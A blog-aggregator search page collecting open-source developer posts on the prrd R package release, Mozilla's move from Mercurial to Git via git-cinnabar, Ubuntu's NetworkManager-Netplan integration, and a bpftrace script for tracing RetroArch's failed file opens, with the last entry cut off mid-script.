Search Results: "ncm"

7 March 2024

Dirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements

Thrilled to share that a new version of prrd arrived at CRAN yesterday, its first update in two and a half years. prrd facilitates the parallel running of reverse dependency checks when preparing R packages. It is used extensively for releases I make of Rcpp, RcppArmadillo, RcppEigen, BH, and others. The key idea of prrd is simple, and described in some more detail on its webpage and its GitHub repo. Reverse dependency checks are an important part of package development that is easily done in a (serial) loop. But these checks are also generally embarrassingly parallel, as there is little or no interdependency between them (besides maybe shared build dependencies). See the (dated) screenshot of a run with six parallel workers, arranged in a split byobu session; a minimal usage sketch follows the NEWS entry below. This release, the first since 2021, brings a number of enhancements. In particular, the summary function is now improved in several ways. Josh also put in a nice PR that generalizes some setup defaults and values. The release is summarised in the NEWS entry:

Changes in prrd version 0.0.6 (2024-03-06)
  • The summary function has received several enhancements:
    • Extended summary is only running when failures are seen.
    • The summariseQueue function now displays an anticipated completion time and remaining duration.
    • The use of optional package foghorn has been refined, and refactored, when running summaries.
  • The dequeueJobs.r script can receive a date argument; the date can be parsed via anydate if anytime is present.
  • The enqueueJobs.r script now considers skipped packages when running 'addfailed', while ensuring selected packages are still on CRAN.
  • The CI setup has been updated (twice).
  • Enqueueing and dequeueing functions and scripts now support relative directories; documentation has been updated (#18 by Joshua Ulrich).
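For readers new to prrd, the workflow described above amounts to enqueueing one check job per reverse dependency and then draining that queue from several workers in parallel. The following is a minimal, hedged sketch only: the script and function names come from the NEWS entry above, but the invocation style, argument order and queue location are illustrative and may not match the actual interface documented with the package.

# enqueue one reverse-dependency check job per package (arguments illustrative)
enqueueJobs.r RcppArmadillo ~/rdep-queue
# start a worker in each of several terminals or byobu panes; they drain the shared queue
dequeueJobs.r RcppArmadillo ~/rdep-queue
# summarise results afterwards (now also reporting anticipated completion time)
summariseQueue.r RcppArmadillo ~/rdep-queue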

Courtesy of my CRANberries, there is also a diffstat report for this release. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

21 November 2023

Mike Hommey: How I (kind of) killed Mercurial at Mozilla

Did you hear the news? Firefox development is moving from Mercurial to Git. While the decision is far from being mine, and I was barely involved in the small incremental changes that ultimately led to this decision, I feel I have to take at least some responsibility. And if you are one of those who would rather use Mercurial than Git, you may direct all your ire at me. But let's take a step back and review the past 25 years leading to this decision. You'll forgive me for skipping some details and any possible inaccuracies. This is already a long post, while I could have been more thorough, even I think that would have been too much. This is also not an official Mozilla position, only my personal perception and recollection as someone who was involved at times, but mostly an observer from a distance. From CVS to DVCS From its release in 1998, the Mozilla source code was kept in a CVS repository. If you're too young to know what CVS is, let's just say it's an old school version control system, with its set of problems. Back then, it was mostly ubiquitous in the Open Source world, as far as I remember. In the early 2000s, the Subversion version control system gained some traction, solving some of the problems that came with CVS. Incidentally, Subversion was created by Jim Blandy, who now works at Mozilla on completely unrelated matters. In the same period, the Linux kernel development moved from CVS to Bitkeeper, which was more suitable to the distributed nature of the Linux community. BitKeeper had its own problem, though: it was the opposite of Open Source, but for most pragmatic people, it wasn't a real concern because free access was provided. Until it became a problem: someone at OSDL developed an alternative client to BitKeeper, and licenses of BitKeeper were rescinded for OSDL members, including Linus Torvalds (they were even prohibited from purchasing one). Following this fiasco, in April 2005, two weeks from each other, both Git and Mercurial were born. The former was created by Linus Torvalds himself, while the latter was developed by Olivia Mackall, who was a Linux kernel developer back then. And because they both came out of the same community for the same needs, and the same shared experience with BitKeeper, they both were similar distributed version control systems. Interestingly enough, several other DVCSes existed: In this landscape, the major difference Git was making at the time was that it was blazing fast. Almost incredibly so, at least on Linux systems. That was less true on other platforms (especially Windows). It was a game-changer for handling large codebases in a smooth manner. Anyways, two years later, in 2007, Mozilla decided to move its source code not to Bzr, not to Git, not to Subversion (which, yes, was a contender), but to Mercurial. The decision "process" was laid down in two rather colorful blog posts. My memory is a bit fuzzy, but I don't recall that it was a particularly controversial choice. All of those DVCSes were still young, and there was no definite "winner" yet (GitHub hadn't even been founded). It made the most sense for Mozilla back then, mainly because the Git experience on Windows still wasn't there, and that mattered a lot for Mozilla, with its diverse platform support. As a contributor, I didn't think much of it, although to be fair, at the time, I was mostly consuming the source tarballs. 
Personal preferences Digging through my archives, I've unearthed a forgotten chapter: I did end up setting up both a Mercurial and a Git mirror of the Firefox source repository on alioth.debian.org. Alioth.debian.org was a FusionForge-based collaboration system for Debian developers, similar to SourceForge. It was the ancestor of salsa.debian.org. I used those mirrors for the Debian packaging of Firefox (cough cough Iceweasel). The Git mirror was created with hg-fast-export, and the Mercurial mirror was only a necessary step in the process. By that time, I had converted my Subversion repositories to Git, and switched off SVK. Incidentally, I started contributing to Git around that time as well. I apparently did this not too long after Mozilla switched to Mercurial. As a Linux user, I think I just wanted the speed that Mercurial was not providing. Not that Mercurial was that slow, but the difference between a couple seconds and a couple hundred milliseconds was a significant enough difference in user experience for me to prefer Git (and Firefox was not the only thing I was using version control for) Other people had also similarly created their own mirror, or with other tools. But none of them were "compatible": their commit hashes were different. Hg-git, used by the latter, was putting extra information in commit messages that would make the conversion differ, and hg-fast-export would just not be consistent with itself! My mirror is long gone, and those have not been updated in more than a decade. I did end up using Mercurial, when I got commit access to the Firefox source repository in April 2010. I still kept using Git for my Debian activities, but I now was also using Mercurial to push to the Mozilla servers. I joined Mozilla as a contractor a few months after that, and kept using Mercurial for a while, but as a, by then, long time Git user, it never really clicked for me. It turns out, the sentiment was shared by several at Mozilla. Git incursion In the early 2010s, GitHub was becoming ubiquitous, and the Git mindshare was getting large. Multiple projects at Mozilla were already entirely hosted on GitHub. As for the Firefox source code base, Mozilla back then was kind of a Wild West, and engineers being engineers, multiple people had been using Git, with their own inconvenient workflows involving a local Mercurial clone. The most popular set of scripts was moz-git-tools, to incorporate changes in a local Git repository into the local Mercurial copy, to then send to Mozilla servers. In terms of the number of people doing that, though, I don't think it was a lot of people, probably a few handfuls. On my end, I was still keeping up with Mercurial. I think at that time several engineers had their own unofficial Git mirrors on GitHub, and later on Ehsan Akhgari provided another mirror, with a twist: it also contained the full CVS history, which the canonical Mercurial repository didn't have. This was particularly interesting for engineers who needed to do some code archeology and couldn't get past the 2007 cutoff of the Mercurial repository. I think that mirror ultimately became the official-looking, but really unofficial, mozilla-central repository on GitHub. On a side note, a Mercurial repository containing the CVS history was also later set up, but that didn't lead to something officially supported on the Mercurial side. Some time around 2011~2012, I started to more seriously consider using Git for work myself, but wasn't satisfied with the workflows others had set up for themselves. 
I really didn't like the idea of wasting extra disk space keeping a Mercurial clone around while using a Git mirror. I wrote a Python script that would use Mercurial as a library to access a remote repository and produce a git-fast-import stream. That would allow the creation of a git repository without a local Mercurial clone. It worked quite well, but it was not able to incrementally update. Other, more complete tools existed already, some of which I mentioned above. But as time was passing and the size and depth of the Mercurial repository was growing, these tools were showing their limits and were too slow for my taste, especially for the initial clone. Boot to Git In the same time frame, Mozilla ventured in the Mobile OS sphere with Boot to Gecko, later known as Firefox OS. What does that have to do with version control? The needs of third party collaborators in the mobile space led to the creation of what is now the gecko-dev repository on GitHub. As I remember it, it was challenging to create, but once it was there, Git users could just clone it and have a working, up-to-date local copy of the Firefox source code and its history... which they could already have, but this was the first officially supported way of doing so. Coincidentally, Ehsan's unofficial mirror was having trouble (to the point of GitHub closing the repository) and was ultimately shut down in December 2013. You'll often find comments on the interwebs about how GitHub has become unreliable since the Microsoft acquisition. I can't really comment on that, but if you think GitHub is unreliable now, rest assured that it was worse in its beginning. And its sustainability as a platform also wasn't a given, being a rather new player. So on top of having this official mirror on GitHub, Mozilla also ventured in setting up its own Git server for greater control and reliability. But the canonical repository was still the Mercurial one, and while Git users now had a supported mirror to pull from, they still had to somehow interact with Mercurial repositories, most notably for the Try server. Git slowly creeping in Firefox build tooling Still in the same time frame, tooling around building Firefox was improving drastically. For obvious reasons, when version control integration was needed in the tooling, Mercurial support was always a no-brainer. The first explicit acknowledgement of a Git repository for the Firefox source code, other than the addition of the .gitignore file, was bug 774109. It added a script to install the prerequisites to build Firefox on macOS (still called OSX back then), and that would print a message inviting people to obtain a copy of the source code with either Mercurial or Git. That was a precursor to current bootstrap.py, from September 2012. Following that, as far as I can tell, the first real incursion of Git in the Firefox source tree tooling happened in bug 965120. A few days earlier, bug 952379 had added a mach clang-format command that would apply clang-format-diff to the output from hg diff. Obviously, running hg diff on a Git working tree didn't work, and bug 965120 was filed, and support for Git was added there. That was in January 2014. A year later, when the initial implementation of mach artifact was added (which ultimately led to artifact builds), Git users were an immediate thought. But while they were considered, it was not to support them, but to avoid actively breaking their workflows. Git support for mach artifact was eventually added 14 months later, in March 2016. 
From gecko-dev to git-cinnabar Let's step back a little here, back to the end of 2014. My user experience with Mercurial had reached a level of dissatisfaction that was enough for me to decide to take that script from a couple years prior and make it work for incremental updates. That meant finding a way to store enough information locally to be able to reconstruct whatever the incremental updates would be relying on (guess why other tools hid a local Mercurial clone under hood). I got something working rather quickly, and after talking to a few people about this side project at the Mozilla Portland All Hands and seeing their excitement, I published a git-remote-hg initial prototype on the last day of the All Hands. Within weeks, the prototype gained the ability to directly push to Mercurial repositories, and a couple months later, was renamed to git-cinnabar. At that point, as a Git user, instead of cloning the gecko-dev repository from GitHub and switching to a local Mercurial repository whenever you needed to push to a Mercurial repository (i.e. the aforementioned Try server, or, at the time, for reviews), you could just clone and push directly from/to Mercurial, all within Git. And it was fast too. You could get a full clone of mozilla-central in less than half an hour, when at the time, other similar tools would take more than 10 hours (needless to say, it's even worse now). Another couple months later (we're now at the end of April 2015), git-cinnabar became able to start off a local clone of the gecko-dev repository, rather than clone from scratch, which could be time consuming. But because git-cinnabar and the tool that was updating gecko-dev weren't producing the same commits, this setup was cumbersome and not really recommended. For instance, if you pushed something to mozilla-central with git-cinnabar from a gecko-dev clone, it would come back with a different commit hash in gecko-dev, and you'd have to deal with the divergence. Eventually, in April 2020, the scripts updating gecko-dev were switched to git-cinnabar, making the use of gecko-dev alongside git-cinnabar a more viable option. Ironically(?), the switch occurred to ease collaboration with KaiOS (you know, the mobile OS born from the ashes of Firefox OS). Well, okay, in all honesty, when the need of syncing in both directions between Git and Mercurial (we only had ever synced from Mercurial to Git) came up, I nudged Mozilla in the direction of git-cinnabar, which, in my (biased but still honest) opinion, was the more reliable option for two-way synchronization (we did have regular conversion problems with hg-git, nothing of the sort has happened since the switch). One Firefox repository to rule them all For reasons I don't know, Mozilla decided to use separate Mercurial repositories as "branches". With the switch to the rapid release process in 2011, that meant one repository for nightly (mozilla-central), one for aurora, one for beta, and one for release. And with the addition of Extended Support Releases in 2012, we now add a new ESR repository every year. Boot to Gecko also had its own branches, and so did Fennec (Firefox for Mobile, before Android). There are a lot of them. And then there are also integration branches, where developer's work lands before being merged in mozilla-central (or backed out if it breaks things), always leaving mozilla-central in a (hopefully) good state. Only one of them remains in use today, though. I can only suppose that the way Mercurial branches work was not deemed practical. 
It is worth noting, though, that Mercurial branches are used in some cases, to branch off a dot-release when the next major release process has already started, so it's not a matter of not knowing the feature exists or some such. In 2016, Gregory Szorc set up a new repository that would contain them all (or at least most of them), which eventually became what is now the mozilla-unified repository. This would e.g. simplify switching between branches when necessary. 7 years later, for some reason, the other "branches" still exist, but most developers are expected to be using mozilla-unified. Mozilla's CI also switched to using mozilla-unified as base repository. Honestly, I'm not sure why the separate repositories are still the main entry point for pushes, rather than going directly to mozilla-unified, but it probably comes down to switching being work, and not being a top priority. Also, it probably doesn't help that working with multiple heads in Mercurial, even (especially?) with bookmarks, can be a source of confusion. To give an example, if you aren't careful, and do a plain clone of the mozilla-unified repository, you may not end up on the latest mozilla-central changeset, but rather, e.g. one from beta, or some other branch, depending which one was last updated. Hosting is simple, right? Put your repository on a server, install hgweb or gitweb, and that's it? Maybe that works for... Mercurial itself, but that repository "only" has slightly over 50k changesets and less than 4k files. Mozilla-central has more than an order of magnitude more changesets (close to 700k) and two orders of magnitude more files (more than 700k if you count the deleted or moved files, 350k if you count the currently existing ones). And remember, there are a lot of "duplicates" of this repository. And I didn't even mention user repositories and project branches. Sure, it's a self-inflicted pain, and you'd think it could probably(?) be mitigated with shared repositories. But consider the simple case of two repositories: mozilla-central and autoland. You make autoland use mozilla-central as a shared repository. Now, you push something new to autoland, it's stored in the autoland datastore. Eventually, you merge to mozilla-central. Congratulations, it's now in both datastores, and you'd need to clean-up autoland if you wanted to avoid the duplication. Now, you'd think mozilla-unified would solve these issues, and it would... to some extent. Because that wouldn't cover user repositories and project branches briefly mentioned above, which in GitHub parlance would be considered as Forks. So you'd want a mega global datastore shared by all repositories, and repositories would need to only expose what they really contain. Does Mercurial support that? I don't think so (okay, I'll give you that: even if it doesn't, it could, but that's extra work). And since we're talking about a transition to Git, does Git support that? You may have read about how you can link to a commit from a fork and make-pretend that it comes from the main repository on GitHub? At least, it shows a warning, now. That's essentially the architectural reason why. So the actual answer is that Git doesn't support it out of the box, but GitHub has some backend magic to handle it somehow (and hopefully, other things like Gitea, Girocco, Gitlab, etc. have something similar). Now, to come back to the size of the repository. A repository is not a static file. It's a server with which you negotiate what you have against what it has that you want. 
Then the server bundles what you asked for based on what you said you have. Or in the opposite direction, you negotiate what you have that it doesn't, you send it, and the server incorporates what you sent it. Fortunately the latter is less frequent and requires authentication. But the former is more frequent and CPU intensive. Especially when pulling a large number of changesets, which, incidentally, cloning is. "But there is a solution for clones" you might say, which is true. That's clonebundles, which offload the CPU intensive part of cloning to a single job scheduled regularly. Guess who implemented it? Mozilla. But that only covers the cloning part. We actually had laid the ground to support offloading large incremental updates and split clones, but that never materialized. Even with all that, that still leaves you with a server that can display file contents, diffs, blames, provide zip archives of a revision, and more, all of which are CPU intensive in their own way. And these endpoints are regularly abused, and cause extra load to your servers, yes plural, because of course a single server won't handle the load for the number of users of your big repositories. And because your endpoints are abused, you have to close some of them. And I'm not mentioning the Try repository with its tens of thousands of heads, which brings its own sets of problems (and it would have even more heads if we didn't fake-merge them once in a while). Of course, all the above applies to Git (and it only gained support for something akin to clonebundles last year). So, when the Firefox OS project was stopped, there wasn't much motivation to continue supporting our own Git server, Mercurial still being the official point of entry, and git.mozilla.org was shut down in 2016. The growing difficulty of maintaining the status quo Slowly, but steadily in more recent years, as new tooling was added that needed some input from the source code manager, support for Git was more and more consistently added. But at the same time, as people left for other endeavors and weren't necessarily replaced, or more recently with layoffs, resources allocated to such tooling have been spread thin. Meanwhile, the repository growth didn't take a break, and the Try repository was becoming an increasing pain, with push times quite often exceeding 10 minutes. The ongoing work to move Try pushes to Lando will hide the problem under the rug, but the underlying problem will still exist (although the last version of Mercurial seems to have improved things). On the flip side, more and more people have been relying on Git for Firefox development, to my own surprise, as I didn't really push for that to happen. It just happened organically, by ways of git-cinnabar existing, providing a compelling experience to those who prefer Git, and, I guess, word of mouth. I was genuinely surprised when I recently heard the use of Git among moz-phab users had surpassed a third. I did, however, occasionally orient people who struggled with Mercurial and said they were more familiar with Git, towards git-cinnabar. I suspect there's a somewhat large number of people who never realized Git was a viable option. But that, on its own, can come with its own challenges: if you use git-cinnabar without being backed by gecko-dev, you'll have a hard time sharing your branches on GitHub, because you can't push to a fork of gecko-dev without pushing your entire local repository, as they have different commit histories. 
And switching to gecko-dev when you weren't already using it requires some extra work to rebase all your local branches from the old commit history to the new one. Clone times with git-cinnabar have also started to go a little out of hand in the past few years, but this was mitigated in a similar manner as with the Mercurial cloning problem: with static files that are refreshed regularly. Ironically, that made cloning with git-cinnabar faster than cloning with Mercurial. But generating those static files is increasingly time-consuming. As of writing, generating those for mozilla-unified takes close to 7 hours. I was predicting clone times over 10 hours "in 5 years" in a post from 4 years ago, I wasn't too far off. With exponential growth, it could still happen, although to be fair, CPUs have improved since. I will explore the performance aspect in a subsequent blog post, alongside the upcoming release of git-cinnabar 0.7.0-b1. I don't even want to check how long it now takes with hg-git or git-remote-hg (they were already taking more than a day when git-cinnabar was taking a couple hours). I suppose it's about time that I clarify that git-cinnabar has always been a side-project. It hasn't been part of my duties at Mozilla, and the extent to which Mozilla supports git-cinnabar is in the form of taskcluster workers on the community instance for both git-cinnabar CI and generating those clone bundles. Consequently, that makes the above git-cinnabar specific issues a Me problem, rather than a Mozilla problem. Taking the leap I can't talk for the people who made the proposal to move to Git, nor for the people who put a green light on it. But I can at least give my perspective. Developers have regularly asked why Mozilla was still using Mercurial, but I think it was the first time that a formal proposal was laid out. And it came from the Engineering Workflow team, responsible for issue tracking, code reviews, source control, build and more. It's easy to say "Mozilla should have chosen Git in the first place", but back in 2007, GitHub wasn't there, Bitbucket wasn't there, and all the available options were rather new (especially compared to the then 21 years-old CVS). I think Mozilla made the right choice, all things considered. Had they waited a couple years, the story might have been different. You might say that Mozilla stayed with Mercurial for so long because of the sunk cost fallacy. I don't think that's true either. But after the biggest Mercurial repository hosting service turned off Mercurial support, and the main contributor to Mercurial going their own way, it's hard to ignore that the landscape has evolved. And the problems that we regularly encounter with the Mercurial servers are not going to get any better as the repository continues to grow. As far as I know, all the Mercurial repositories bigger than Mozilla's are... not using Mercurial. Google has its own closed-source server, and Facebook has another of its own, and it's not really public either. With resources spread thin, I don't expect Mozilla to be able to continue supporting a Mercurial server indefinitely (although I guess Octobus could be contracted to give a hand, but is that sustainable?). Mozilla, being a champion of Open Source, also doesn't live in a silo. At some point, you have to meet your contributors where they are. And the Open Source world is now majoritarily using Git. 
I'm sure the vast majority of new hires at Mozilla in the past, say, 5 years, know Git and have had to learn Mercurial (although they arguably didn't need to). Even within Mozilla, with thousands(!) of repositories on GitHub, Firefox is now actually the exception rather than the norm. I should even actually say Desktop Firefox, because even Mobile Firefox lives on GitHub (although Fenix is moving back in together with Desktop Firefox, and the timing is such that that will probably happen before Firefox moves to Git). Heck, even Microsoft moved to Git! With a significant developer base already using Git thanks to git-cinnabar, and all the constraints and problems I mentioned previously, it actually seems natural that a transition (finally) happens. However, had git-cinnabar or something similarly viable not existed, I don't think Mozilla would be in a position to take this decision. On one hand, it probably wouldn't be in the current situation of having to support both Git and Mercurial in the tooling around Firefox, nor the resource constraints related to that. But on the other hand, it would be farther from supporting Git and being able to make the switch in order to address all the other problems. But... GitHub? I hope I made a compelling case that hosting is not as simple as it can seem, at the scale of the Firefox repository. It's also not Mozilla's main focus. Mozilla has enough on its plate with the migration of existing infrastructure that does rely on Mercurial to understandably not want to figure out the hosting part, especially with limited resources, and with the mixed experience hosting both Mercurial and git has been so far. After all, GitHub couldn't even display things like the contributors' graph on gecko-dev until recently, and hosting is literally their job! They still drop the ball on large blames (thankfully we have searchfox for those). Where does that leave us? Gitlab? For those criticizing GitHub for being proprietary, that's probably not open enough. Cloud Source Repositories? "But GitHub is Microsoft" is a complaint I've read a lot after the announcement. Do you think Google hosting would have appealed to these people? Bitbucket? I'm kind of surprised it wasn't in the list of providers that were considered, but I'm also kind of glad it wasn't (and I'll leave it at that). I think the only relatively big hosting provider that could have made the people criticizing the choice of GitHub happy is Codeberg, but I hadn't even heard of it before it was mentioned in response to Mozilla's announcement. But really, with literal thousands of Mozilla repositories already on GitHub, with literal tens of millions repositories on the platform overall, the pragmatic in me can't deny that it's an attractive option (and I can't stress enough that I wasn't remotely close to the room where the discussion about what choice to make happened). "But it's a slippery slope". I can see that being a real concern. LLVM also moved its repository to GitHub (from a (I think) self-hosted Subversion server), and ended up moving off Bugzilla and Phabricator to GitHub issues and PRs four years later. As an occasional contributor to LLVM, I hate this move. I hate the GitHub review UI with a passion. At least, right now, GitHub PRs are not a viable option for Mozilla, for their lack of support for security related PRs, and the more general shortcomings in the review UI. That doesn't mean things won't change in the future, but let's not get too far ahead of ourselves. 
The move to Git has just been announced, and the migration has not even begun yet. Just because Mozilla is moving the Firefox repository to GitHub doesn't mean it's locked in forever or that all the eggs are going to be thrown into one basket. If bridges need to be crossed in the future, we'll see then. So, what's next? The official announcement said we're not expecting the migration to really begin until six months from now. I'll swim against the current here, and say this: the earlier you can switch to git, the earlier you'll find out what works and what doesn't work for you, whether you already know Git or not. While there is not one unique workflow, here's what I would recommend anyone who wants to take the leap off Mercurial right now: As there is no one-size-fits-all workflow, I won't tell you how to organize yourself from there. I'll just say this: if you know the Mercurial sha1s of your previous local work, you can create branches for them with:
$ git branch <branch_name> $(git cinnabar hg2git <hg_sha1>)
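For anyone who has not set up git-cinnabar at all yet, the step that the above presupposes is an initial clone of the canonical Mercurial repository through git-cinnabar's hg:: remote helper. A hedged sketch follows; the repository URL and target directory are illustrative, and the official instructions may recommend a different bootstrap.
$ git clone hg::https://hg.mozilla.org/mozilla-unified firefox
$ cd firefox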
At this point, you should have everything available on the Git side, and you can remove the .hg directory. Or move it into some empty directory somewhere else, just in case. But don't leave it here, it will only confuse the tooling. Artifact builds WILL be confused, though, and you'll have to ./mach configure before being able to do anything. You may also hit bug 1865299 if your working tree is older than this post. If you have any problem or question, you can ping me on #git-cinnabar or #git on Matrix. I'll put the instructions above somewhere on wiki.mozilla.org, and we can collaboratively iterate on them. Now, what the announcement didn't say is that the Git repository WILL NOT be gecko-dev, doesn't exist yet, and WON'T BE COMPATIBLE (trust me, it'll be for the better). Why did I make you do all the above, you ask? Because that won't be a problem. I'll have you covered, I promise. The upcoming release of git-cinnabar 0.7.0-b1 will have a way to smoothly switch between gecko-dev and the future repository (incidentally, that will also allow to switch from a pure git-cinnabar clone to a gecko-dev one, for the git-cinnabar users who have kept reading this far). What about git-cinnabar? With Mercurial going the way of the dodo at Mozilla, my own need for git-cinnabar will vanish. Legitimately, this begs the question whether it will still be maintained. I can't answer for sure. I don't have a crystal ball. However, the needs of the transition itself will motivate me to finish some long-standing things (like finalizing the support for pushing merges, which is currently behind an experimental flag) or implement some missing features (support for creating Mercurial branches). Git-cinnabar started as a Python script, it grew a sidekick implemented in C, which then incorporated some Rust, which then cannibalized the Python script and took its place. It is now close to 90% Rust, and 10% C (if you don't count the code from Git that is statically linked to it), and has sort of become my Rust playground (it's also, I must admit, a mess, because of its history, but it's getting better). So the day to day use with Mercurial is not my sole motivation to keep developing it. If it were, it would stay stagnant, because all the features I need are there, and the speed is not all that bad, although I know it could be better. Arguably, though, git-cinnabar has been relatively stagnant feature-wise, because all the features I need are there. So, no, I don't expect git-cinnabar to die along Mercurial use at Mozilla, but I can't really promise anything either. Final words That was a long post. But there was a lot of ground to cover. And I still skipped over a bunch of things. I hope I didn't bore you to death. If I did and you're still reading... what's wrong with you? ;) So this is the end of Mercurial at Mozilla. So long, and thanks for all the fish. But this is also the beginning of a transition that is not easy, and that will not be without hiccups, I'm sure. So fasten your seatbelts (plural), and welcome the change. To circle back to the clickbait title, did I really kill Mercurial at Mozilla? Of course not. But it's like I stumbled upon a few sparks and tossed a can of gasoline on them. I didn't start the fire, but I sure made it into a proper bonfire... and now it has turned into a wildfire. And who knows? 15 years from now, someone else might be looking back at how Mozilla picked Git at the wrong time, and that, had we waited a little longer, we would have picked some yet to come new horse. 
But hey, that's the tech cycle for you.

12 November 2023

Lukas Märdian: Netplan brings consistent network configuration across Desktop, Server, Cloud and IoT

Ubuntu 23.10 Mantic Minotaur Desktop, showing network settings

We released Ubuntu 23.10 Mantic Minotaur on 12 October 2023, shipping its proven and trusted network stack based on Netplan. Netplan has been the default tool to configure Linux networking on Ubuntu since 2016. In the past, it was primarily used to control the Server and Cloud variants of Ubuntu, while on Desktop systems it would hand over control to NetworkManager. In Ubuntu 23.10 this disparity in how the network stack is controlled on different Ubuntu platforms was closed by integrating NetworkManager with the underlying Netplan stack. Netplan could already be used to describe network connections on Desktop systems managed by NetworkManager, but network connections created or modified through NetworkManager would not be known to Netplan, so it was a one-way street. Activating the bidirectional NetworkManager-Netplan integration allows any configuration change made through NetworkManager to be propagated back into Netplan. Changes made in Netplan itself will still be visible in NetworkManager, as before. This way, Netplan can be considered the single source of truth for network configuration across all variants of Ubuntu, with the network configuration stored in /etc/netplan/, using Netplan's common and declarative YAML format.
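For reference, a hedged sketch of the kind of declarative YAML this refers to is shown below. The file name and interface name are illustrative assumptions on my part, not taken from the post.

/etc/netplan/01-network-manager-all.yaml (illustrative):
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp3s0:
      dhcp4: true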

Netplan Desktop integration On workstations, the most common scenario is for users to configure networking through NetworkManager's graphical interface, instead of driving it through Netplan's declarative YAML files. Netplan ships a libnetplan library that provides an API to access Netplan's parser and validation internals, which is now used by NetworkManager to store any network interface configuration changes in Netplan. For instance, network configuration defined through NetworkManager's graphical UI or D-Bus API will be exported to Netplan's native YAML format in the common location at /etc/netplan/. This way, the only thing administrators need to care about when managing a fleet of Desktop installations is Netplan. Furthermore, programmatic access to all network configuration is now easily accessible to other system components integrating with Netplan, such as snapd. This solution has already been used in more confined environments, such as Ubuntu Core, and is now enabled by default on Ubuntu 23.10 Desktop.

Migration of existing connection profiles On installation of the NetworkManager package (network-manager >= 1.44.2-1ubuntu1) in Ubuntu 23.10, all your existing connection profiles from /etc/NetworkManager/system-connections/ will automatically and transparently be migrated to Netplan's declarative YAML format and stored in its common configuration directory /etc/netplan/. The same migration will happen in the background whenever you add or modify any connection profile through the NetworkManager user interface, integrated with GNOME Shell. From this point on, Netplan will be aware of your entire network configuration and you can query it using its CLI tools, such as sudo netplan get or sudo netplan status, without interrupting traditional NetworkManager workflows (UI, nmcli, nmtui, D-Bus APIs). You can observe this migration on the apt-get command line, watching out for logs like the following:
Setting up network-manager (1.44.2-1ubuntu1.1) ...
Migrating HomeNet (9d087126-ae71-4992-9e0a-18c5ea92a4ed) to /etc/netplan
Migrating eduroam (37d643bb-d81d-4186-9402-7b47632c59b1) to /etc/netplan
Migrating DebConf (f862be9c-fb06-4c0f-862f-c8e210ca4941) to /etc/netplan
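Once the migration has happened, the consolidated configuration can be inspected with the Netplan CLI tools mentioned above, without going through NetworkManager. For example:

sudo netplan status
sudo netplan get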
In order to prepare for a smooth transition, NetworkManager tests were integrated into Netplan's continuous integration pipeline at the upstream GitHub repository. Furthermore, we implemented a passthrough method of handling unknown or new settings that cannot yet be fully covered by Netplan, making Netplan future-proof for any upcoming NetworkManager release.
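To give a rough idea of what the migration and the passthrough mechanism produce, a migrated profile might look something like the sketch below. The file name, interface match and exact key layout are my assumptions and may not match what the tooling actually writes; the point is only the general shape: a NetworkManager-rendered definition carrying the original connection's UUID and name, with unknown settings passed through verbatim.

/etc/netplan/90-NM-9d087126-ae71-4992-9e0a-18c5ea92a4ed.yaml (illustrative):
network:
  version: 2
  ethernets:
    NM-9d087126-ae71-4992-9e0a-18c5ea92a4ed:
      renderer: NetworkManager
      match:
        name: "enp3s0"
      dhcp4: true
      networkmanager:
        uuid: "9d087126-ae71-4992-9e0a-18c5ea92a4ed"
        name: "HomeNet"
        passthrough:
          connection.permissions: ""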

The future of Netplan Netplan has established itself as the proven network stack across all variants of Ubuntu: Desktop, Server, Cloud, or Embedded. It has been the default stack across many Ubuntu LTS releases, serving millions of users over the years. With the bidirectional integration between NetworkManager and Netplan, the final piece of the puzzle is in place to consider Netplan the single source of truth for network configuration on Ubuntu. With Debian choosing Netplan as the default network stack for its cloud images, it is also gaining traction outside the Ubuntu ecosystem and growing into the wider open source community. Within the development cycle for Ubuntu 24.04 LTS, we will polish the Netplan codebase to be ready for a 1.0 release, coming with certain guarantees on API and ABI stability, so that other distributions and third-party integrations can rely on Netplan's interfaces. First steps in that direction have already been taken, as the Netplan team reached out to the Debian community at DebConf 2023 in Kochi, India to evaluate possible synergies.

Conclusion Netplan can be used transparently to control a workstation's network configuration and plays hand-in-hand with many desktop environments through its tight integration with NetworkManager. It allows for easy network monitoring using common graphical interfaces, and provides a single source of truth to network administrators, allowing for configuration of Ubuntu Desktop fleets in a streamlined and declarative way. You can try this new functionality hands-on by following the "Access Desktop NetworkManager settings through Netplan" tutorial.
If you want to learn more, feel free to follow our activities on Netplan.io, GitHub, Launchpad, IRC or our Netplan Developer Diaries blog on discourse.

6 January 2023

Jonathan McDowell: Finally making use of bpftrace

I am old enough to remember when BPF meant the traditional Berkeley Packet Filter, and was confined to filtering network packets. It's grown into much, much more as eBPF, and getting familiar with it so that I can add it to the suite of tips and tricks I can call upon has been on my to-do list for a while. To this end I was lucky enough to attend a live walk-through of bpftrace last year. bpftrace is a high-level tool that allows the easy creation and execution of eBPF tracers under Linux. Recently I've been working on updating the RetroArch packages in Debian, and as I was doing so I realised there was a need to update the quite outdated retroarch-assets package, which contains various icons and images used for the user interface. I wanted to try to re-generate as many of the artefacts as I could, to ensure the proper source was available. However it wasn't always clear which files were actually needed and which were either source or legacy. So I wanted to trace file opens by retroarch and see when it was failing to find files. Traditionally this is something I'd have used strace for, but it seemed like a great opportunity to try out bpftrace. It turns out bpftrace ships with an example, opensnoop.bt, which demonstrates hooking the open syscall entry and exit and reports all files opened on the system. I only wanted to track opens by the retroarch binary that failed, so I made a couple of modifications:
retro-failed-open-snoop.bt
#!/usr/bin/env bpftrace
/*
 * retro-failed-open-snoop - snoop failed opens by RetroArch
 *
 * Based on:
 * opensnoop	Trace open() syscalls.
 *		For Linux, uses bpftrace and eBPF.
 *
 * Copyright 2018 Netflix, Inc.
 * Licensed under the Apache License, Version 2.0 (the "License")
 *
 * 08-Sep-2018	Brendan Gregg	Created this.
 */
BEGIN
{
    printf("Tracing open syscalls... Hit Ctrl-C to end.\n");
    printf("%-6s %-16s %3s %s\n", "PID", "COMM", "ERR", "PATH");
}

tracepoint:syscalls:sys_enter_open,
tracepoint:syscalls:sys_enter_openat
{
    @filename[tid] = args->filename;
}

tracepoint:syscalls:sys_exit_open,
tracepoint:syscalls:sys_exit_openat
/@filename[tid]/
{
    $ret = args->ret;
    $errno = $ret > 0 ? 0 : - $ret;
    if (($ret <= 0) && (strncmp("retroarch", comm, 9) == 0)) {
        printf("%-6d %-16s %3d %s\n", pid, comm, $errno,
